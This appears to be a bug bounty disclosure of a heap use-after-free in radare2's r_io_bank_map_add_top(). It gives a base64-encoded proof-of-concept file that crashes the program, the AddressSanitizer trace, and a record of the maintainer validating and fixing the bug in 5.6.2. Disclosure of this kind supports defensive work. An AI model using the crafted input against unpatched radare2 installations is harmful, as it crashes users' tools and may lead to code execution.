Use After Free in radareorg/radare2

Valid

Reported on

Feb 9th 2022

Description

Use After Free occurs in r_io_bank_map_add_top().

commit : 4d75eeb99a0d913e9b443e7aaf73aa44a323739d

Proof of Concept

$ echo -ne "VlowMFcwMOEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwEDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwADAwMDAwMCEAADAhAAAwMAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAAw
MDAwMDAiAAAwIgAAMDAAADAwMAAwMDAwMDAwMDAwMDAwMDAAMDAwMDAwADAwIgAAsCIAADAwAAAw
ADAwMDAwMDAwMDAwMDAwMDAwADAwMAAwMDAwMDAwADAwIjAwMCIwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMGEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAMDAw
ADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAAwMAAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAOAAAwFgAAMDAAADAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwADAAADAsAAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAADAw
AAAwMAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwRwAAMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAAMAAAMGEAADAwAAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwADAwMDAwMDAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAAAMBkwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMBkAADAiAAAAMAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAwMBgAMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMBsAAAAnAAAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
AAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAADAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMAAwMBgAMDAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwADAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMBkAADA3MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMBgAADAQ
AAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDDZMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAMDAwMDAwMDAwGAAAWAAAADAwAAAwMAAwMDAwMDAwMDAw
MDAwMDAwADAwMDAwADAwMAAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDCt
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMAcwMDAwAAAwMAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAZAAAwGTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwGQAAMBkAADAwAAAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAADAaAAAwGgAAMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
IDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAhAAAwITAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
MDAw" | base64 -d > poc

ASAN

$ ASAN_OPTIONS=detect_odr_violation=0 r2 poc
=================================================================
==1491342==ERROR: AddressSanitizer: heap-use-after-free on address 0x604001aa6ff0 at pc 0x7fea015cecb8 bp 0x7ffc3b311b00 sp 0x7ffc3b311af8
READ of size 8 at 0x604001aa6ff0 thread T0
    #0 0x7fea015cecb7 in r_io_bank_map_add_top /home/alkyne/fuzzing/r2-debug/libr/io/io_bank.c:229:18
    #1 0x7fea015b8672 in r_io_map_add /home/alkyne/fuzzing/r2-debug/libr/io/io_map.c:158:8
    #2 0x7fe9fe860af0 in add_section /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:2697:16
    #3 0x7fe9fe84efa0 in bin_sections /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:3113:4
    #4 0x7fe9fe841459 in r_core_bin_info /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:4245:10
    #5 0x7fe9fe840ff0 in r_core_bin_set_env /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:346:3
    #6 0x7fe9fe796ed5 in r_core_file_do_load_for_io_plugin /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:440:6
    #7 0x7fe9fe791c65 in r_core_bin_load /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:636:4
    #8 0x7fea01a03251 in r_main_radare2 /home/alkyne/fuzzing/r2-debug/libr/main/radare2.c:1177:15
    #9 0x55bb78d3724e in main /home/alkyne/fuzzing/r2-debug/binr/radare2/radare2.c:96:9
    #10 0x7fea017b00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x55bb78c8b2cd in _start (/home/alkyne/fuzzing/r2-debug/binr/radare2/radare2+0x1d2cd)

0x604001aa6ff0 is located 32 bytes inside of 40-byte region [0x604001aa6fd0,0x604001aa6ff8)
freed by thread T0 here:
    #0 0x55bb78d05f22 in free (/home/alkyne/fuzzing/r2-debug/binr/radare2/radare2+0x97f22)
    #1 0x7fea01cd56c9 in r_crbtree_take /home/alkyne/fuzzing/r2-debug/libr/util/new_rbtree.c:359:3
    #2 0x7fea01cd6bf6 in r_crbtree_delete /home/alkyne/fuzzing/r2-debug/libr/util/new_rbtree.c:376:9
    #3 0x7fea015cee82 in r_io_bank_map_add_top /home/alkyne/fuzzing/r2-debug/libr/io/io_bank.c:233:12
    #4 0x7fea015b8672 in r_io_map_add /home/alkyne/fuzzing/r2-debug/libr/io/io_map.c:158:8
    #5 0x7fe9fe860af0 in add_section /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:2697:16
    #6 0x7fe9fe84efa0 in bin_sections /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:3113:4
    #7 0x7fe9fe841459 in r_core_bin_info /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:4245:10
    #8 0x7fe9fe840ff0 in r_core_bin_set_env /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:346:3
    #9 0x7fe9fe796ed5 in r_core_file_do_load_for_io_plugin /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:440:6
    #10 0x7fe9fe791c65 in r_core_bin_load /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:636:4
    #11 0x7fea01a03251 in r_main_radare2 /home/alkyne/fuzzing/r2-debug/libr/main/radare2.c:1177:15
    #12 0x55bb78d3724e in main /home/alkyne/fuzzing/r2-debug/binr/radare2/radare2.c:96:9
    #13 0x7fea017b00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

previously allocated by thread T0 here:
    #0 0x55bb78d06302 in calloc (/home/alkyne/fuzzing/r2-debug/binr/radare2/radare2+0x98302)
    #1 0x7fea01cd422e in _node_new /home/alkyne/fuzzing/r2-debug/libr/util/new_rbtree.c:104:18
    #2 0x7fea01cd392b in r_crbtree_insert /home/alkyne/fuzzing/r2-debug/libr/util/new_rbtree.c:161:8
    #3 0x7fea015ce220 in r_io_bank_map_add_top /home/alkyne/fuzzing/r2-debug/libr/io/io_bank.c:175:8
    #4 0x7fea015b8672 in r_io_map_add /home/alkyne/fuzzing/r2-debug/libr/io/io_map.c:158:8
    #5 0x7fea015b09c8 in r_io_open_at /home/alkyne/fuzzing/r2-debug/libr/io/io.c:90:2
    #6 0x7fe9fe860e63 in io_create_mem_map /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:2645:10
    #7 0x7fe9fe860892 in add_section /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:2676:8
    #8 0x7fe9fe84efa0 in bin_sections /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:3113:4
    #9 0x7fe9fe841459 in r_core_bin_info /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:4245:10
    #10 0x7fe9fe840ff0 in r_core_bin_set_env /home/alkyne/fuzzing/r2-debug/libr/core/cbin.c:346:3
    #11 0x7fe9fe796ed5 in r_core_file_do_load_for_io_plugin /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:440:6
    #12 0x7fe9fe791c65 in r_core_bin_load /home/alkyne/fuzzing/r2-debug/libr/core/cfile.c:636:4
    #13 0x7fea01a03251 in r_main_radare2 /home/alkyne/fuzzing/r2-debug/libr/main/radare2.c:1177:15
    #14 0x55bb78d3724e in main /home/alkyne/fuzzing/r2-debug/binr/radare2/radare2.c:96:9
    #15 0x7fea017b00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-use-after-free /home/alkyne/fuzzing/r2-debug/libr/io/io_bank.c:229:18 in r_io_bank_map_add_top
Shadow bytes around the buggy address:
  0x0c088034cda0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c088034cdb0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c088034cdc0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c088034cdd0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c088034cde0: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
=>0x0c088034cdf0: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd[fd]fa
  0x0c088034ce00: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c088034ce10: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
  0x0c088034ce20: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
  0x0c088034ce30: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
  0x0c088034ce40: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1491342==ABORTING

Impact

Use After Free may lead to exploiting the program, which can allow the attacker to execute arbitrary code.

We are processing your report and will contact the radareorg/radare2 team within 24 hours. a year ago

alkyne Choi modified the report

a year ago

pancake validated this vulnerability a year ago

alkyne Choi has been awarded the disclosure bounty

The fix bounty is now up for grabs

We have sent a fix follow up to the radareorg/radare2 team. We will try again in 7 days. a year ago

pancake marked this as fixed in 5.6.2 with commit b5cb90 a year ago

pancake has been awarded the fix bounty

This vulnerability will not receive a CVE

pancake

commented a year ago

Maintainer

Actually i find a better (proper) fix to this funky bug. Here's the right commit: https://github.com/radareorg/radare2/commit/3345147916b9bb3da225248d571cdbac690c0c4d

to join this conversation